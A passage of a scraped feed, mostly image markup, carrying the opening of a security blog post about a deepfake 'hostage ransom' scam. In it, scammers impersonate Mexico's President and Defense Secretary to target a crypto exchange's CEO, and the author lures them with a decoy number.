https://substackcdn.com/image/fetch/$s_!DYau!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F43360b67-a06f-47b5-8a71-f6527d8c4753_1024x1024.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!DYau!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F43360b67-a06f-47b5-8a71-f6527d8c4753_1024x1024.png" width="244" height="244" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/43360b67-a06f-47b5-8a71-f6527d8c4753_1024x1024.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1024,&quot;width&quot;:1024,&quot;resizeWidth&quot;:244,&quot;bytes&quot;:1269638,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/188606888?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F43360b67-a06f-47b5-8a71-f6527d8c4753_1024x1024.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!DYau!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F43360b67-a06f-47b5-8a71-f6527d8c4753_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!DYau!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F43360b67-a06f-47b5-8a71-f6527d8c4753_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!DYau!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F43360b67-a06f-47b5-8a71-f6527d8c4753_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!DYau!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F43360b67-a06f-47b5-8a71-f6527d8c4753_1024x1024.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption"><em>Still here? Have a Special Edition Cheems.</em></figcaption></figure></div><p></p>]]></content:encoded></item><item><title><![CDATA[Hostage situation]]></title><description><![CDATA[When the President herself asks for your help]]></description><link>https://quetzal.bitso.com/p/hostage-situation</link><guid isPermaLink="false">https://quetzal.bitso.com/p/hostage-situation</guid><dc:creator><![CDATA[Mauro Eldritch]]></dc:creator><pubDate>Wed, 11 Feb 2026 14:41:43 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!cYzB!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab901d74-db50-43f4-bc58-26982c26ad9c_2776x1622.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!cYzB!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab901d74-db50-43f4-bc58-26982c26ad9c_2776x1622.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!cYzB!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab901d74-db50-43f4-bc58-26982c26ad9c_2776x1622.png 424w, https://substackcdn.com/image/fetch/$s_!cYzB!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab901d74-db50-43f4-bc58-26982c26ad9c_2776x1622.png 848w, https://substackcdn.com/image/fetch/$s_!cYzB!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab901d74-db50-43f4-bc58-26982c26ad9c_2776x1622.png 1272w, https://substackcdn.com/image/fetch/$s_!cYzB!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab901d74-db50-43f4-bc58-26982c26ad9c_2776x1622.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!cYzB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab901d74-db50-43f4-bc58-26982c26ad9c_2776x1622.png" width="1456" height="851" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ab901d74-db50-43f4-bc58-26982c26ad9c_2776x1622.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/cefb28e2-2037-4567-8d63-44268e7bcc89_2776x1622.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:851,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:1119762,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/187582368?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcefb28e2-2037-4567-8d63-44268e7bcc89_2776x1622.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!cYzB!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab901d74-db50-43f4-bc58-26982c26ad9c_2776x1622.png 424w, https://substackcdn.com/image/fetch/$s_!cYzB!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab901d74-db50-43f4-bc58-26982c26ad9c_2776x1622.png 848w, https://substackcdn.com/image/fetch/$s_!cYzB!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab901d74-db50-43f4-bc58-26982c26ad9c_2776x1622.png 1272w, https://substackcdn.com/image/fetch/$s_!cYzB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab901d74-db50-43f4-bc58-26982c26ad9c_2776x1622.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Yes, that&#8217;s me.</p><p>You&#8217;re probably wondering how I ended up in a Zoom call with the <strong>President of Mexico</strong>, her <strong>generals</strong>, and high-level <strong>officials</strong>.</p><p>Just a normal day at the office.</p><div><hr></div><h2>Hostage Situation</h2><p>It all started with a call to our <strong>CEO</strong> from <strong>an official number</strong> belonging to the <strong><a href="https://www.gob.mx/sre">Ministry of Foreign Affairs (SRE)</a></strong>. They politely asked if he could take a call from the <strong>Secretary of Defense</strong>. Upon agreeing, the conversation moved first to WhatsApp, then to <strong>Signal</strong>.  </p><p>On Signal, he received a message supposedly from the <strong>Secretary of National Defense</strong>, <strong><a href="https://www.gob.mx/defensa/estructuras/general-ricardo-trevilla-trejo">General Ricardo Trevilla Trejo</a></strong>. The message claimed to urgently need our cooperation and invited him to a <strong>Zoom</strong> briefing.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!g2Zd!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F32da6976-84d9-41ca-9942-e576324e978f_1410x1596.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!g2Zd!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F32da6976-84d9-41ca-9942-e576324e978f_1410x1596.png 424w, https://substackcdn.com/image/fetch/$s_!g2Zd!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F32da6976-84d9-41ca-9942-e576324e978f_1410x1596.png 848w, https://substackcdn.com/image/fetch/$s_!g2Zd!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F32da6976-84d9-41ca-9942-e576324e978f_1410x1596.png 1272w, https://substackcdn.com/image/fetch/$s_!g2Zd!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F32da6976-84d9-41ca-9942-e576324e978f_1410x1596.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!g2Zd!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F32da6976-84d9-41ca-9942-e576324e978f_1410x1596.png" width="428" height="484.4595744680851" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/32da6976-84d9-41ca-9942-e576324e978f_1410x1596.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/44a79e1c-23bf-48be-a715-8454837ecb02_1410x1596.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1596,&quot;width&quot;:1410,&quot;resizeWidth&quot;:428,&quot;bytes&quot;:172426,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/187582368?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44a79e1c-23bf-48be-a715-8454837ecb02_1410x1596.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!g2Zd!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F32da6976-84d9-41ca-9942-e576324e978f_1410x1596.png 424w, https://substackcdn.com/image/fetch/$s_!g2Zd!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F32da6976-84d9-41ca-9942-e576324e978f_1410x1596.png 848w, https://substackcdn.com/image/fetch/$s_!g2Zd!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F32da6976-84d9-41ca-9942-e576324e978f_1410x1596.png 1272w, https://substackcdn.com/image/fetch/$s_!g2Zd!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F32da6976-84d9-41ca-9942-e576324e978f_1410x1596.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">&#8220;For security reasons, let&#8217;s talk here - General Ricardo Trevilla&#8221;</figcaption></figure></div><p>Fearing our old <a href="https://quetzal.bitso.com/p/final-chapter-interview-with-the">fencing comrades</a> might be back for a rematch, we agreed I should go first and join the call. Just in case.</p><p>But as soon as I joined, the caller&#8217;s webcam activated automatically and began playing a <a href="https://en.wikipedia.org/wiki/Deepfake">deepfaked</a> video showing <strong>Mexican President <a href="https://www.presidenta.gob.mx/biografia">Claudia Sheinbaum</a></strong>, <strong>General Trevilla Trejo</strong>, and other <strong>cabinet members</strong> in what appeared to be an emergency meeting (translation below).</p><div class="native-video-embed" data-component-name="VideoPlaceholder" data-attrs="{&quot;mediaUploadId&quot;:&quot;2d8ed883-380f-4ffc-929a-2ae4a04dd3d8&quot;,&quot;duration&quot;:null}"></div><p>They discussed a <strong><a href="https://en.wikipedia.org/wiki/Hostage">hostage situation</a> involving three Mexican citizens</strong>, stating that while they usually <em>refuse</em> to <strong>pay ransoms</strong>, this time would be an <em>exception</em>. They also expressed a desire to handle the matter <em>discreetly</em>, asking for everyone&#8217;s cooperation and assuring that all <strong>contributions would be appreciated and repaid</strong> once the crisis was over.</p><p>At this point, we were already <strong>involved in the negotiations</strong> without being formally asked. And while I don&#8217;t have the authority to release payments or negotiate this kind of crisis, I wasn&#8217;t going to miss the opportunity to tell all of <strong>LinkedIn</strong> about the <em>10 valuable lessons hostage negotiations taught me about B2B sales</em>.</p><p>Technically speaking, the deepfake was flaky, but overall, the setup was solid. They were <strong>spoofing real phone numbers,</strong> <strong>impersonating</strong> the right <strong>people</strong>, and <strong>spear-phishing</strong> a high-value target.</p><p>Far more advanced than<a href="https://quetzal.bitso.com/p/interview-with-the-chollima-vi"> other threat actors</a> we&#8217;ve fenced with in the past.</p><p>So, as a <em>Threat Management Specialist</em>, I had to manage this threat&#8230; in a <strong>special way.</strong></p><div><hr></div><h2>Presidential Crisis</h2><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!9ulA!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4849c24e-6ece-468c-a426-55bdcf4c9c62_1408x474.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!9ulA!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4849c24e-6ece-468c-a426-55bdcf4c9c62_1408x474.png 424w, https://substackcdn.com/image/fetch/$s_!9ulA!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4849c24e-6ece-468c-a426-55bdcf4c9c62_1408x474.png 848w, https://substackcdn.com/image/fetch/$s_!9ulA!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4849c24e-6ece-468c-a426-55bdcf4c9c62_1408x474.png 1272w, https://substackcdn.com/image/fetch/$s_!9ulA!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4849c24e-6ece-468c-a426-55bdcf4c9c62_1408x474.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!9ulA!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4849c24e-6ece-468c-a426-55bdcf4c9c62_1408x474.png" width="546" height="183.8096590909091" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/4849c24e-6ece-468c-a426-55bdcf4c9c62_1408x474.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/8d5b900d-f975-4edd-b4d8-459b99a1504e_1408x474.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:474,&quot;width&quot;:1408,&quot;resizeWidth&quot;:546,&quot;bytes&quot;:77448,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/187582368?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8d5b900d-f975-4edd-b4d8-459b99a1504e_1408x474.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!9ulA!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4849c24e-6ece-468c-a426-55bdcf4c9c62_1408x474.png 424w, https://substackcdn.com/image/fetch/$s_!9ulA!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4849c24e-6ece-468c-a426-55bdcf4c9c62_1408x474.png 848w, https://substackcdn.com/image/fetch/$s_!9ulA!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4849c24e-6ece-468c-a426-55bdcf4c9c62_1408x474.png 1272w, https://substackcdn.com/image/fetch/$s_!9ulA!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4849c24e-6ece-468c-a426-55bdcf4c9c62_1408x474.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">&#8220;Daniel, I&#8217;ve had a slight setback. I&#8217;m still talking with the President. I&#8217;ll call you back shortly, please stay ready.&#8221;</figcaption></figure></div><p>Time to rescue those <strong>hostages</strong>. We&#8217;ll bring you back home boys.</p><p>Our first move was to take some weight off our <strong>CEO</strong> and shift the conversation over to <strong>me</strong>. I&#8217;d handle the presidential crisis while he focused on <em>CEO things</em>, you know, like running <strong>LATAM&#8217;s number one crypto exchange</strong>. </p><p>Which, in case you thought otherwise, is no minor challenge.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!lizs!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7c728508-398d-4cb3-8c7a-781d36ef3eba_782x1630.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!lizs!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7c728508-398d-4cb3-8c7a-781d36ef3eba_782x1630.png 424w, https://substackcdn.com/image/fetch/$s_!lizs!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7c728508-398d-4cb3-8c7a-781d36ef3eba_782x1630.png 848w, https://substackcdn.com/image/fetch/$s_!lizs!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7c728508-398d-4cb3-8c7a-781d36ef3eba_782x1630.png 1272w, https://substackcdn.com/image/fetch/$s_!lizs!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7c728508-398d-4cb3-8c7a-781d36ef3eba_782x1630.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!lizs!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7c728508-398d-4cb3-8c7a-781d36ef3eba_782x1630.png" width="278" height="579.462915601023" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7c728508-398d-4cb3-8c7a-781d36ef3eba_782x1630.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/bc1b9989-46aa-4888-889c-88d4e6b4f885_782x1630.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1630,&quot;width&quot;:782,&quot;resizeWidth&quot;:278,&quot;bytes&quot;:505046,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/187582368?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbc1b9989-46aa-4888-889c-88d4e6b4f885_782x1630.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!lizs!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7c728508-398d-4cb3-8c7a-781d36ef3eba_782x1630.png 424w, https://substackcdn.com/image/fetch/$s_!lizs!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7c728508-398d-4cb3-8c7a-781d36ef3eba_782x1630.png 848w, https://substackcdn.com/image/fetch/$s_!lizs!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7c728508-398d-4cb3-8c7a-781d36ef3eba_782x1630.png 1272w, https://substackcdn.com/image/fetch/$s_!lizs!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7c728508-398d-4cb3-8c7a-781d36ef3eba_782x1630.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">&#8220;I&#8217;m now reaching out from a number outside the country to ensure the secure channel remains intact&#8221;.</figcaption></figure></div><p>We shared a <a href="https://en.wikipedia.org/wiki/Uruguay">Uruguayan</a> decoy number with them to shift the workload onto me.</p><p>Posing as the <strong>Chief Government Affairs Officer</strong> (a title I pulled straight from thin air), I struck up a conversation with the threat actors in an attempt <strong>to lure them into our trap</strong>. </p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Bv5e!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7858bd6d-07bb-4754-849f-6654e480a9a1_730x1328.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Bv5e!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7858bd6d-07bb-4754-849f-6654e480a9a1_730x1328.png 424w, https://substackcdn.com/image/fetch/$s_!Bv5e!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7858bd6d-07bb-4754-849f-6654e480a9a1_730x1328.png 848w, 